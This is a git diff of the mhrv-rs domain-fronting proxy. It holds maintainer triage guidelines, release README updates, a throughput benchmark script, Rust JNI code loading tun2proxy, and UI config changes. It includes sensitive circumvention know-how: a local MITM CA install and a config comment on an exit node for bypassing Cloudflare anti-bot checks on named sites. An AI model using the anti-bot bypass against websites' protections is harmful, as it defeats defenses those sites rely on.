+- **Don't promise fixes you can't deliver**. The Iran ISP throttle is not something the project can fix; saying "we're working on it" is OK, "we'll fix it next release" is not.
+- **Don't pretend certainty**. v1.8.1's over-confident "AUTH_KEY mismatch" message in the decoy detection cost trust with reporters who turned out to be hitting one of the other candidate causes. v1.8.2 + v1.8.3 are explicitly less assertive ("could be one of the following four/six causes...") because being honest about uncertainty is the better long-term move.
+- **Acknowledge community contributions liberally**. When a contributor's report shaped a roadmap item, say so by name. When a PR lands, thank them in the merge commit + PR comment + changelog. The project runs on goodwill.
+- **Don't apologize excessively** but do correct yourself when wrong. Iterating publicly through wrong hypotheses to a correct one is fine; doubling down on a wrong assertion is not.
+
+## Persian translation specifics
+
+When writing Persian replies:
+
+- **Half-spaces (ZWNJ — `‌`)** in compound words: `می‌خواهم` (not `میخواهم` or `می خواهم`), `نمی‌توانم` (not `نمیتوانم`)
+- **Persian numerals**: optional but common in formal writing — `۲۰،۰۰۰` instead of `20,000`. Code/commands always Latin numerals.
+- **English technical terms in Persian text**: leave them in Latin script with surrounding Persian particles. Example: `از طریق Apps Script روی Google` (not transliterated)
+- **Quotation marks**: Persian uses `«...»` rather than `"..."` for prose. Code/commands use `"..."` regardless.
+- **The reply marker stays in English** as established. Don't translate `reviewed by` to Persian.
+
+## DOPR cycle structure
+
+When triaging a batch of issues/PRs, work through them in this order:
+
+1. **Read everything first** — list PRs, list recently-updated issues, scan headlines. Don't reply to issue 1 before knowing what issues 2-15 contain. Often there are clusters that should be addressed together (e.g., five users all hit the v1.8.0 decoy on the same day).
+2. **Triage by pattern** — match each issue to a pattern from `issue-patterns.md`. Issues that match a pattern get pattern-canonical replies (with specifics drawn from the user's actual log lines). Issues that don't match a pattern get individual attention.
+3. **Substantive PRs first** — if a PR has tests passing and looks mergeable, merge it. Then your subsequent issue replies can reference "shipped in vX.Y.Z" instead of "queued for next release".
+4. **Reply in batches but not as templates** — write each reply to address that user's specific log lines, config quirks, or terminology. Templated replies are easy to spot and erode trust.
+5. **Close cleanly** — if an issue was a duplicate, close at the end of your reply with the close-comment pointing to canonical thread. If it's awaiting user verification, leave open with last comment from you.
+6. **Cut releases when work lands** — don't accumulate fixes across multiple work sessions. Each session that lands user-visible code → one tag → one release.
diff --git a/releases/README.md b/releases/README.md
index d96ede6c..71595e2f 100644
--- a/releases/README.md
+++ b/releases/README.md
@@ -2,11 +2,11 @@
 
 This folder contains the prebuilt binaries from the latest release, committed directly to the repository for users who cannot reach the GitHub Releases page.
 
-Current version: **v1.1.0**
+Current version: **v1.9.25**
 
 | File | Platform | Contents |
 |---|---|---|
-| `mhrv-rs-android-universal-v1.1.0.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file |
+| `mhrv-rs-android-universal-v1.9.25.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file |
 | `mhrv-rs-linux-amd64.tar.gz` | Linux x86_64 | `mhrv-rs`, `mhrv-rs-ui`, `run.sh` |
 | `mhrv-rs-linux-arm64.tar.gz` | Linux aarch64 | `mhrv-rs`, `run.sh` (CLI only) |
 | `mhrv-rs-raspbian-armhf.tar.gz` | Raspberry Pi / ARMv7 hardfloat | `mhrv-rs`, `run.sh` (CLI only) |
@@ -45,7 +45,7 @@ Extract `mhrv-rs-windows-amd64.zip`, then double-click `run.bat` inside the extr
 
 ### Android
 
-Copy `mhrv-rs-android-universal-v1.1.0.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester).
+Copy `mhrv-rs-android-universal-v1.9.25.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester).
 
 See the [main README](../README.md) for desktop setup (Apps Script deployment, config, browser proxy settings).
 
@@ -55,7 +55,7 @@ See the [main README](../README.md) for desktop setup (Apps Script deployment, c
 
 این پوشه شامل فایل‌های آخرین نسخه است و مستقیماً در ریپو قرار گرفته برای کاربرانی که به صفحهٔ GitHub Releases دسترسی ندارند.
 
-نسخهٔ فعلی: **v1.1.0**
+نسخهٔ فعلی: **v1.9.25**
 
 ### دانلود از طریق ZIP
 
@@ -73,6 +73,6 @@ cd mhrv-rs-macos-arm64
 
 **ویندوز:** فایل `mhrv-rs-windows-amd64.zip` را extract کنید و داخل پوشه روی `run.bat` دو بار کلیک کنید (UAC را قبول کنید تا گواهی MITM نصب شود).
 
-**اندروید:** فایل `mhrv-rs-android-universal-v1.1.0.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست.
+**اندروید:** فایل `mhrv-rs-android-universal-v1.9.25.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست.
 
 برای راه‌اندازی کامل دسکتاپ (دیپلوی Apps Script، config، تنظیم proxy مرورگر) به [README اصلی](../README.md) مراجعه کنید.
diff --git a/releases/mhrv-rs-android-arm64-v8a-v1.9.25.apk b/releases/mhrv-rs-android-arm64-v8a-v1.9.25.apk
new file mode 100644
index 00000000..7bb927c6
Binary files /dev/null and b/releases/mhrv-rs-android-arm64-v8a-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-armeabi-v7a-v1.9.25.apk b/releases/mhrv-rs-android-armeabi-v7a-v1.9.25.apk
new file mode 100644
index 00000000..a2f5410d
Binary files /dev/null and b/releases/mhrv-rs-android-armeabi-v7a-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-universal-v1.1.0.apk b/releases/mhrv-rs-android-universal-v1.9.25.apk
similarity index 76%
rename from releases/mhrv-rs-android-universal-v1.1.0.apk
rename to releases/mhrv-rs-android-universal-v1.9.25.apk
index 417022c1..130b0c32 100644
Binary files a/releases/mhrv-rs-android-universal-v1.1.0.apk and b/releases/mhrv-rs-android-universal-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-x86-v1.9.25.apk b/releases/mhrv-rs-android-x86-v1.9.25.apk
new file mode 100644
index 00000000..e230473a
Binary files /dev/null and b/releases/mhrv-rs-android-x86-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-android-x86_64-v1.9.25.apk b/releases/mhrv-rs-android-x86_64-v1.9.25.apk
new file mode 100644
index 00000000..c2acc3d9
Binary files /dev/null and b/releases/mhrv-rs-android-x86_64-v1.9.25.apk differ
diff --git a/releases/mhrv-rs-linux-amd64.tar.gz b/releases/mhrv-rs-linux-amd64.tar.gz
index 30e2a7ff..49032b72 100644
Binary files a/releases/mhrv-rs-linux-amd64.tar.gz and b/releases/mhrv-rs-linux-amd64.tar.gz differ
diff --git a/releases/mhrv-rs-linux-arm64.tar.gz b/releases/mhrv-rs-linux-arm64.tar.gz
index 121f5b1e..c8cdd96c 100644
Binary files a/releases/mhrv-rs-linux-arm64.tar.gz and b/releases/mhrv-rs-linux-arm64.tar.gz differ
diff --git a/releases/mhrv-rs-linux-musl-amd64.tar.gz b/releases/mhrv-rs-linux-musl-amd64.tar.gz
index 87f3e8c5..3662b8ed 100644
Binary files a/releases/mhrv-rs-linux-musl-amd64.tar.gz and b/releases/mhrv-rs-linux-musl-amd64.tar.gz differ
diff --git a/releases/mhrv-rs-linux-musl-arm64.tar.gz b/releases/mhrv-rs-linux-musl-arm64.tar.gz
index 53a75366..47aa0bb5 100644
Binary files a/releases/mhrv-rs-linux-musl-arm64.tar.gz and b/releases/mhrv-rs-linux-musl-arm64.tar.gz differ
diff --git a/releases/mhrv-rs-macos-amd64-app.zip b/releases/mhrv-rs-macos-amd64-app.zip
index 6d371b1f..08c0a169 100644
Binary files a/releases/mhrv-rs-macos-amd64-app.zip and b/releases/mhrv-rs-macos-amd64-app.zip differ
diff --git a/releases/mhrv-rs-macos-amd64.tar.gz b/releases/mhrv-rs-macos-amd64.tar.gz
index 46c62afb..cdef7eee 100644
Binary files a/releases/mhrv-rs-macos-amd64.tar.gz and b/releases/mhrv-rs-macos-amd64.tar.gz differ
diff --git a/releases/mhrv-rs-macos-arm64-app.zip b/releases/mhrv-rs-macos-arm64-app.zip
index cf5cf66b..7312941c 100644
Binary files a/releases/mhrv-rs-macos-arm64-app.zip and b/releases/mhrv-rs-macos-arm64-app.zip differ
diff --git a/releases/mhrv-rs-macos-arm64.tar.gz b/releases/mhrv-rs-macos-arm64.tar.gz
index c19d34d8..58af3249 100644
Binary files a/releases/mhrv-rs-macos-arm64.tar.gz and b/releases/mhrv-rs-macos-arm64.tar.gz differ
diff --git a/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz
new file mode 100644
index 00000000..85941964
Binary files /dev/null and b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz differ
diff --git a/releases/mhrv-rs-raspbian-armhf.tar.gz b/releases/mhrv-rs-raspbian-armhf.tar.gz
index 72726890..c344ea83 100644
Binary files a/releases/mhrv-rs-raspbian-armhf.tar.gz and b/releases/mhrv-rs-raspbian-armhf.tar.gz differ
diff --git a/releases/mhrv-rs-windows-amd64.zip b/releases/mhrv-rs-windows-amd64.zip
index baed0917..f89beb2b 100644
Binary files a/releases/mhrv-rs-windows-amd64.zip and b/releases/mhrv-rs-windows-amd64.zip differ
diff --git a/scripts/bench-pipeline.sh b/scripts/bench-pipeline.sh
new file mode 100755
index 00000000..65fd2aba
--- /dev/null
+++ b/scripts/bench-pipeline.sh
@@ -0,0 +1,140 @@
+#!/usr/bin/env bash
+#
+# bench-pipeline.sh — compare throughput: serial (depth=1) vs pipelined (depth=10)
+#
+# Builds mhrv-rs twice (patching the INFLIGHT_ACTIVE constant), runs each
+# as a local SOCKS5 proxy, downloads through the full tunnel, reports.
+#
+# Usage:
+#   ./scripts/bench-pipeline.sh [CONFIG_FILE]
+#
+# Default: config.json
+
+set -euo pipefail
+
+CONFIG="${1:-config.json}"
+RUNS=3
+SOCKS_PORT=18088
+HTTP_PORT=18087
+TEST_URL="https://speed.cloudflare.com/__down?bytes=5000000"
+SRC="src/tunnel_client.rs"
+TMPDIR_BENCH=$(mktemp -d)
+
+cleanup() {  # EXIT trap: remove the temp dir, stop the proxy if one was started, restore the patched constant
+    rm -rf "$TMPDIR_BENCH"
+    kill "${PROXY_PID:-}" 2>/dev/null || true  # PROXY_PID is unset until run_test starts a proxy; a bare $PROXY_PID would abort the trap under `set -u` and skip the restore below
+    # Restore original constant (-i.bak is accepted by both GNU and BSD sed, unlike -i ''); best-effort, errors ignored
+    { sed -i.bak "s/^const INFLIGHT_ACTIVE: usize = [0-9]*/const INFLIGHT_ACTIVE: usize = 10/" "$SRC" && rm -f "$SRC.bak"; } 2>/dev/null || true
+}
+trap cleanup EXIT
+
+if [ ! -f "$CONFIG" ]; then
+    echo "ERROR: Config not found: $CONFIG"
+    exit 1
+fi
+
+echo "╔══════════════════════════════════════════════╗"
+echo "║     Pipeline Throughput Benchmark            ║"
+echo "╠══════════════════════════════════════════════╣"
+echo "║ Config:    $CONFIG"
+echo "║ Test URL:  $TEST_URL"
+echo "║ Runs:      $RUNS per mode"
+echo "╚══════════════════════════════════════════════╝"
+echo ""
+
+# Write a temp config with our ports
+TEMP_CONFIG="$TMPDIR_BENCH/config.json"
+python3 -c "
+import json
+with open('$CONFIG') as f:
+    c = json.load(f)
+c['listen_port'] = $HTTP_PORT
+c['socks5_port'] = $SOCKS_PORT
+c['log_level'] = 'warn'
+with open('$TEMP_CONFIG', 'w') as f:
+    json.dump(c, f)
+"
+
+run_test() {  # run_test LABEL BINARY — start BINARY as a proxy, time $RUNS downloads of $TEST_URL, append "label|avg KB/s|avg s" to results.txt
+    local label="$1"
+    local binary="$2"
+    echo "━━━ $label ━━━"
+
+    $binary -c "$TEMP_CONFIG" &
+    PROXY_PID=$!  # not declared local: cleanup() reads the same variable
+    sleep 3  # fixed grace period before the liveness check below
+
+    if ! kill -0 $PROXY_PID 2>/dev/null; then
+        echo "  ERROR: Proxy failed to start"
+        return
+    fi
+
+    # Wait for proxy: up to 15 attempts, 1s apart, until a request through the SOCKS5 port succeeds; continues regardless if none does
+    for attempt in $(seq 1 15); do
+        if curl -s --socks5-hostname localhost:$SOCKS_PORT --connect-timeout 5 -o /dev/null https://www.google.com 2>/dev/null; then
+            break
+        fi
+        sleep 1
+    done
+
+    local total_bytes=0
+    local total_time=0
+
+    for i in $(seq 1 $RUNS); do
+        local result  # "<size_download> <time_total> <speed_download>" from curl -w; "0 999 0" is echoed when curl exits non-zero
+        result=$(curl -s --socks5-hostname localhost:$SOCKS_PORT \
+            -o /dev/null \
+            -w '%{size_download} %{time_total} %{speed_download}' \
+            --connect-timeout 30 \
+            --max-time 90 \
+            "$TEST_URL" 2>/dev/null || echo "0 999 0")
+
+        local bytes time_s speed
+        bytes=$(echo "$result" | awk '{print $1}')
+        time_s=$(echo "$result" | awk '{print $2}')
+        speed=$(echo "$result" | awk '{printf "%.0f", $3/1024}')  # third field divided by 1024, rounded, shown as KB/s
+
+        total_bytes=$((total_bytes + ${bytes%.*}))  # drop any fractional part: shell arithmetic is integer-only
+        total_time=$(echo "$total_time + $time_s" | bc)  # bc handles the fractional seconds
+
+        printf "  Run %d: %.1fs  %s KB/s\n" "$i" "$time_s" "$speed"
+    done
+
+    local avg_speed avg_time
+    avg_speed=$(echo "scale=1; $total_bytes / $total_time / 1024" | bc 2>/dev/null || echo "0")  # total bytes / total seconds / 1024 across all runs
+    avg_time=$(echo "scale=1; $total_time / $RUNS" | bc 2>/dev/null || echo "0")
+    printf "  ➜ Average: %s KB/s  (%.1fs per download)\n\n" "$avg_speed" "$avg_time"
+
+    kill $PROXY_PID 2>/dev/null || true
+    wait $PROXY_PID 2>/dev/null || true
+    sleep 1
+
+    echo "$label|$avg_speed|$avg_time" >> "$TMPDIR_BENCH/results.txt"  # one line per mode; parsed by the summary loop with IFS='|'
+}
+
+# Build serial (depth=1); -i.bak works with both GNU and BSD sed (-i '' is BSD-only), the backup is removed right after
+echo "Building serial mode (INFLIGHT_ACTIVE=1)..."
+sed -i.bak "s/^const INFLIGHT_ACTIVE: usize = [0-9]*/const INFLIGHT_ACTIVE: usize = 1/" "$SRC"; rm -f "$SRC.bak"
+cargo build --release 2>&1 | tail -1
+cp target/release/mhrv-rs "$TMPDIR_BENCH/mhrv-serial"
+
+# Build pipelined (depth=10)
+echo "Building pipelined mode (INFLIGHT_ACTIVE=10)..."
+sed -i.bak "s/^const INFLIGHT_ACTIVE: usize = [0-9]*/const INFLIGHT_ACTIVE: usize = 10/" "$SRC"; rm -f "$SRC.bak"
+cargo build --release 2>&1 | tail -1
+cp target/release/mhrv-rs "$TMPDIR_BENCH/mhrv-pipelined"
+
+echo ""
+
+# Run tests
+run_test "Serial (depth=1)" "$TMPDIR_BENCH/mhrv-serial"
+run_test "Pipelined (depth=10)" "$TMPDIR_BENCH/mhrv-pipelined"
+
+# Summary
+echo "╔══════════════════════════════════════════════╗"
+echo "║               RESULTS                       ║"
+echo "╠══════════════════════════════════════════════╣"
+while IFS='|' read -r label speed time; do
+    printf "║  %-25s %6s KB/s  %5ss\n" "$label" "$speed" "$time"
+done < "$TMPDIR_BENCH/results.txt"
+echo "╚══════════════════════════════════════════════╝"
diff --git a/src/android_jni.rs b/src/android_jni.rs
index 6f467bec..a551e83e 100644
--- a/src/android_jni.rs
+++ b/src/android_jni.rs
@@ -42,7 +42,7 @@ struct Running {
     rt: Option<Runtime>,
     /// Keep an Arc to the DomainFronter so `statsJson(handle)` can read the
     /// live stats without going through the async server. `None` for
-    /// google-only / full-only configs where the fronter isn't used.
+    /// direct / full-only configs where the fronter isn't used.
     fronter: Option<Arc<crate::domain_fronter::DomainFronter>>,
 }
 
@@ -199,7 +199,7 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_startProxy(
         // Try to build the runtime first — if allocation fails we want to
         // know before spinning up anything stateful.
         let rt = match tokio::runtime::Builder::new_multi_thread()
-            .worker_threads(2)
+            .worker_threads(4)
             .enable_all()
             .thread_name("mhrv-worker")
             .build()
@@ -457,7 +457,7 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_testSni<'a>(
 
 /// `Native.statsJson(long handle)` -> String. Returns a JSON blob with the
 /// live `StatsSnapshot` for a running proxy, or an empty string if the
-/// handle is unknown or the proxy has no fronter (google_only / full modes).
+/// handle is unknown or the proxy has no fronter (direct / full modes).
 ///
 /// Cheap — just reads a handful of atomics. The Kotlin UI polls this on a
 /// timer to render the "Usage today (estimated)" card.
@@ -482,3 +482,100 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_statsJson<'a>(
     }));
     env.new_string(out).map(|s| s.into_raw()).unwrap_or(std::ptr::null_mut())
 }
+
+/// `Native.pipelineDebugJson()` -> String. Snapshot of pipeline debug state:
+/// elevated session count, batch semaphore usage, recent ramp/drop events.
+/// Temporary — for the debug overlay.
+#[no_mangle]
+pub extern "system" fn Java_com_therealaleph_mhrv_Native_pipelineDebugJson<'a>(
+    env: JNIEnv<'a>,
+    _class: JClass,
+) -> jstring {
+    let out = safe(String::new(), AssertUnwindSafe(|| {
+        crate::tunnel_client::pipeline_debug::to_json()
+    }));
+    env.new_string(out).map(|s| s.into_raw()).unwrap_or(std::ptr::null_mut())
+}
+
+// ---------------------------------------------------------------------------
+// tun2proxy CLI API wrapper (dlsym — no fork or patch needed)
+// ---------------------------------------------------------------------------
+
+/// `Native.runTun2proxy(cliArgs, tunMtu)` -> int
+///
+/// Calls `tun2proxy_run_with_cli_args` from libtun2proxy.so via dlsym.
+/// This is the C API the tun2proxy maintainer recommends for callers that
+/// need full CLI flexibility (e.g. --udpgw-server). BLOCKS until shutdown.
+///
+/// Returns the library call's own return code, or:
+/// * `-1`  — the fallback handed to `safe` (presumably used on panic)
+/// * `-10` — `dlopen` of libtun2proxy.so failed
+/// * `-11` — `dlsym` of `tun2proxy_run_with_cli_args` failed
+/// * `-12` — `tunMtu` is outside `0..=65535` or `cliArgs` contains a NUL
+#[no_mangle]
+pub extern "system" fn Java_com_therealaleph_mhrv_Native_runTun2proxy<'a>(
+    mut env: JNIEnv<'a>,
+    _class: JClass,
+    cli_args: JString,
+    tun_mtu: jni::sys::jint,
+) -> jni::sys::jint {
+    safe(-1, AssertUnwindSafe(|| {
+        use std::ffi::{CStr, CString};
+
+        let args_str = jstring_to_string(&mut env, &cli_args);
+        tracing::info!("runTun2proxy: cli={}", args_str);
+
+        // Validate before loading anything, so no early return below needs
+        // a dlclose. A bare `tun_mtu as u16` silently wraps negative or
+        // >65535 values, and an interior NUL makes `CString::new` fail.
+        if tun_mtu < 0 || tun_mtu > i32::from(u16::MAX) {
+            tracing::error!("runTun2proxy: tun_mtu {} is outside 0..=65535", tun_mtu);
+            return -12;
+        }
+        let mtu = tun_mtu as u16; // lossless: range-checked just above
+        let c_args = match CString::new(args_str) {
+            Ok(c_args) => c_args,
+            Err(_) => {
+                tracing::error!("runTun2proxy: cli args contain an interior NUL byte");
+                return -12;
+            }
+        };
+
+        // SAFETY: both names passed to dlopen/dlsym are NUL-terminated byte
+        // literals, `c_args` outlives the call that borrows its pointer,
+        // dlerror() is null-checked before being read, and `handle` is only
+        // used after its own null check. The `RunFn` signature is assumed to
+        // match the symbol exported by libtun2proxy.so; nothing verifies it.
+        unsafe {
+            // dlerror() returns NULL when no error is pending, and
+            // `CStr::from_ptr(NULL)` is undefined behaviour.
+            let last_dl_error = || {
+                let msg = libc::dlerror();
+                if msg.is_null() {
+                    String::from("unknown error")
+                } else {
+                    CStr::from_ptr(msg).to_string_lossy().into_owned()
+                }
+            };
+
+            let handle = libc::dlopen(b"libtun2proxy.so\0".as_ptr().cast(), libc::RTLD_NOW);
+            if handle.is_null() {
+                tracing::error!("dlopen libtun2proxy.so failed: {:?}", last_dl_error());
+                return -10;
+            }
+
+            let func = libc::dlsym(handle, b"tun2proxy_run_with_cli_args\0".as_ptr().cast());
+            if func.is_null() {
+                tracing::error!("dlsym tun2proxy_run_with_cli_args: {:?}", last_dl_error());
+                libc::dlclose(handle);
+                return -11;
+            }
+
+            type RunFn = unsafe extern "C" fn(*const std::ffi::c_char, u16, bool) -> i32;
+            let run: RunFn = std::mem::transmute(func);
+            let rc = run(c_args.as_ptr(), mtu, false);
+            libc::dlclose(handle);
+            rc
+        }
+    }))
+}
diff --git a/src/bin/ui.rs b/src/bin/ui.rs
index 8409863b..e0f8f6d1 100644
--- a/src/bin/ui.rs
+++ b/src/bin/ui.rs
@@ -9,10 +9,11 @@ use tokio::runtime::Runtime;
 use tokio::sync::Mutex as AsyncMutex;
 use tokio::task::JoinHandle;
 
-use mhrv_rs::cert_installer::install_ca;
-use mhrv_rs::config::{Config, ScriptId};
+use mhrv_rs::cert_installer::{install_ca, reconcile_sudo_environment, remove_ca};
+use mhrv_rs::config::{Config, FrontingGroup, ScriptId};
 use mhrv_rs::data_dir;
 use mhrv_rs::domain_fronter::{DomainFronter, DEFAULT_GOOGLE_SNI_POOL};
+use mhrv_rs::lan_utils::{detect_lan_ip, is_share_on_lan};
 use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE};
 use mhrv_rs::proxy_server::ProxyServer;
 use mhrv_rs::{scan_ips, scan_sni, test_cmd};
@@ -24,21 +25,38 @@ const LOG_MAX: usize = 200;
 
 fn main() -> eframe::Result<()> {
     let _ = rustls::crypto::ring::default_provider().install_default();
+    // Re-point HOME at the invoking user if this binary was launched
+    // under sudo (see cert_installer::reconcile_sudo_environment). Must
+    // run before any data_dir / firefox_profile_dirs call.
+    reconcile_sudo_environment();
     mhrv_rs::rlimit::raise_nofile_limit_best_effort();
 
     let shared = Arc::new(Shared::default());
     let (cmd_tx, cmd_rx) = std::sync::mpsc::channel::<Cmd>();
 
+    // Load the user's saved form first so we can seed the tracing filter
+    // with their saved log level. Otherwise the form's log-level combobox
+    // would only ever take effect via env var or after Save → restart, and
+    // users on the UI binary (issue #401) reasonably expect the saved
+    // config.json `log_level` to apply at boot like it does for the CLI.
+    let (form, load_err) = load_form();
+    let initial_toast = load_err.map(|e| (e, Instant::now()));
+
     // Hook tracing events into the Recent log panel. Without this every
     // tracing::info! / debug! / trace! the proxy emits gets swallowed and
     // the panel only ever shows our manual push_log calls, making the log
     // level selector look useless (issue #12 bug 2).
     //
-    // The env-filter respects RUST_LOG if set, otherwise defaults to info
-    // so users see routing decisions immediately without any knob-turning.
-    // When they start the proxy and Save the config, the log level from the
-    // config is applied to the in-process filter (see on_start below).
-    install_ui_tracing(shared.clone());
+    // Filter precedence (issue #401 fix in v1.8.2):
+    //   1. RUST_LOG env var if set                         — explicit override
+    //   2. Saved config's `log_level` (passed from form)   — what users mean
+    //      when they pick a level in the UI
+    //   3. "info,hyper=warn"                               — sensible default
+    //
+    // Save inside the running UI also installs the new filter via the
+    // reload handle (see `LOG_RELOAD` below), so users don't need to
+    // restart for a config change to take effect.
+    install_ui_tracing(shared.clone(), &form.log_level);
 
     let shared_bg = shared.clone();
     std::thread::Builder::new()
@@ -46,9 +64,6 @@ fn main() -> eframe::Result<()> {
         .spawn(move || background_thread(shared_bg, cmd_rx))
         .expect("failed to spawn background thread");
 
-    let (form, load_err) = load_form();
-    let initial_toast = load_err.map(|e| (e, Instant::now()));
-
     // Pick the renderer. Default is `glow` (OpenGL 2+) because that's
     // what we shipped through v1.0.x and it has the least binary-size
     // overhead. Users on older Windows boxes / RDP sessions / headless
@@ -68,7 +83,11 @@ fn main() -> eframe::Result<()> {
             .with_inner_size([WIN_WIDTH, WIN_HEIGHT])
             .with_min_inner_size([420.0, 400.0])
             .with_title(format!("mhrv-rs {}", VERSION)),
-        renderer: if use_wgpu { eframe::Renderer::Wgpu } else { eframe::Renderer::Glow },
+        renderer: if use_wgpu {
+            eframe::Renderer::Wgpu
+        } else {
+            eframe::Renderer::Glow
+        },
         ..Default::default()
     };
 
@@ -116,6 +135,22 @@ struct UiState {
     /// Set while a download of a release asset is in flight. `None` when
     /// idle or after a completed download has been acknowledged.
     download_in_progress: bool,
+    /// Set while an install-or-remove cert op is in flight. Install and
+    /// Remove share this single flag so they can't race each other:
+    /// clicking Install → Remove back-to-back would otherwise leave the
+    /// final trust/file state dependent on thread scheduling — an
+    /// in-flight install could re-trust the CA after Remove had already
+    /// deleted it, or vice versa. Both UI buttons disable while this
+    /// is set, and both handlers gate-and-flip it.
+    cert_op_in_progress: bool,
+    /// Set synchronously when `Cmd::Start` is received by the background
+    /// thread, cleared synchronously when `Cmd::Stop` completes. Broader
+    /// than `running` (which only flips after the MITM manager has
+    /// finished loading). Used to block `Remove CA` during the window
+    /// between start-click and `running = true` — otherwise a queued
+    /// `Cmd::RemoveCa` could delete `ca/` while the server is partway
+    /// through loading the keypair into memory.
+    proxy_active: bool,
     /// One-line status of the most recent download (Ok(path) or Err(msg)).
     last_download: Option<Result<std::path::PathBuf, String>>,
     last_download_at: Option<Instant>,
@@ -139,6 +174,7 @@ enum Cmd {
     Stop,
     Test(Config),
     InstallCa,
+    RemoveCa,
     CheckCaTrusted,
     PollStats,
     /// Probe a single SNI against the given google_ip. Result is written
@@ -181,9 +217,11 @@ struct App {
 
 #[derive(Clone)]
 struct FormState {
-    /// `"apps_script"` (default) or `"google_only"`. Controls whether the
-    /// Apps Script relay is wired up at all. In `google_only`, the form
-    /// tolerates an empty script_id / auth_key.
+    /// `"apps_script"` (default), `"direct"`, or `"full"`. Controls
+    /// whether the Apps Script relay is wired up at all. In `direct`,
+    /// the form tolerates an empty script_id / auth_key.
+    /// On load we normalize the legacy `"google_only"` string to
+    /// `"direct"` so the next save rewrites the on-disk config.
     mode: String,
     script_id: String,
     auth_key: String,
@@ -209,11 +247,57 @@ struct FormState {
     show_log: bool,
     fetch_ips_from_api: bool,
     max_ips_to_scan: usize,
-    scan_batch_size:usize,
+    scan_batch_size: usize,
     google_ip_validation: bool,
     normalize_x_graphql: bool,
     youtube_via_relay: bool,
     passthrough_hosts: Vec<String>,
+    /// Round-tripped from config.json so the UI's save path doesn't
+    /// drop the user's setting. Not currently exposed as a UI control;
+    /// users edit `block_quic` directly in `config.json` (Issue #213).
+    block_quic: bool,
+    /// Round-tripped from config.json and exposed beside QUIC blocking.
+    /// Default true to push WebRTC apps toward TCP TURN instead of slow
+    /// UDP ICE retries.
+    block_stun: bool,
+    /// Round-tripped from config.json. Not exposed as a UI control —
+    /// users edit `disable_padding` directly when needed (Issue #391).
+    /// Default false (padding active).
+    disable_padding: bool,
+    /// Round-tripped from config.json. Not exposed as a UI control —
+    /// users edit `force_http1` directly when needed. Default false
+    /// (HTTP/2 multiplexing on the relay leg active).
+    force_http1: bool,
+    /// Round-tripped from config.json. Not exposed in the UI form yet —
+    /// the bypass-DoH default is the right answer for almost everyone
+    /// (DoH already encrypts, the tunnel was just adding latency), so
+    /// this is a config-only opt-out. See config.rs `tunnel_doh`.
+    tunnel_doh: bool,
+    /// User-supplied DoH hostnames added to the built-in default list,
+    /// round-tripped from config.json. See config.rs `bypass_doh_hosts`.
+    bypass_doh_hosts: Vec<String>,
+    /// PR #763: when true, immediately reject browser DoH CONNECTs so the
+    /// browser falls back to system DNS (tun2proxy virtual DNS — instant).
+    /// Round-tripped from config.json. Desktop UI doesn't expose a toggle
+    /// yet — Android does. See config.rs `block_doh`.
+    block_doh: bool,
+    /// Multi-edge fronting groups. Round-tripped from config.json so
+    /// the UI's Save doesn't drop the user's hand-edited groups —
+    /// there is no UI editor for these yet, only file-edited config.
+    /// See config.rs `fronting_groups`.
+    fronting_groups: Vec<FrontingGroup>,
+    /// Auto-blacklist tuning + per-batch timeout. Config-only knobs (no UI
+    /// fields yet — power-user file edit). Round-tripped through FormState
+    /// so Save preserves the user's hand-edited values. See config.rs
+    /// `auto_blacklist_*` and `request_timeout_secs`.
+    auto_blacklist_strikes: u32,
+    auto_blacklist_window_secs: u64,
+    auto_blacklist_cooldown_secs: u64,
+    request_timeout_secs: u64,
+    /// Optional second-hop exit node for CF-anti-bot bypass (chatgpt.com /
+    /// claude.ai / grok.com / x.com). Config-only — no UI editor yet.
+    /// See `assets/exit_node/` for the generic exit-node handler.
+    exit_node: mhrv_rs::config::ExitNodeConfig,
 }
 
 #[derive(Clone, Debug)]
@@ -254,7 +338,10 @@ fn load_form() -> (FormState, Option<String>) {
             }
         }
     } else {
-        tracing::info!("config: no config found at {} — starting with defaults", path.display());
+        tracing::info!(
+            "config: no config found at {} — starting with defaults",
+            path.display()
+        );
         (None, None)
     };
     let form = if let Some(c) = existing {
@@ -268,8 +355,18 @@ fn load_form() -> (FormState, Option<String>) {
             },
         };
         let sni_pool = sni_pool_for_form(c.sni_hosts.as_deref(), &c.front_domain);
+        // Normalize the legacy `google_only` mode string on load. The
+        // backend's `mode_kind()` accepts the alias forever, but storing
+        // it as `direct` in the form means the next Save rewrites the
+        // on-disk config to the new name — one-way migration, no warn
+        // on every startup.
+        let mode_normalized = if c.mode == "google_only" {
+            "direct".to_string()
+        } else {
+            c.mode.clone()
+        };
         FormState {
-            mode: c.mode.clone(),
+            mode: mode_normalized,
             script_id: sid,
             auth_key: c.auth_key,
             google_ip: c.google_ip,
@@ -286,13 +383,26 @@ fn load_form() -> (FormState, Option<String>) {
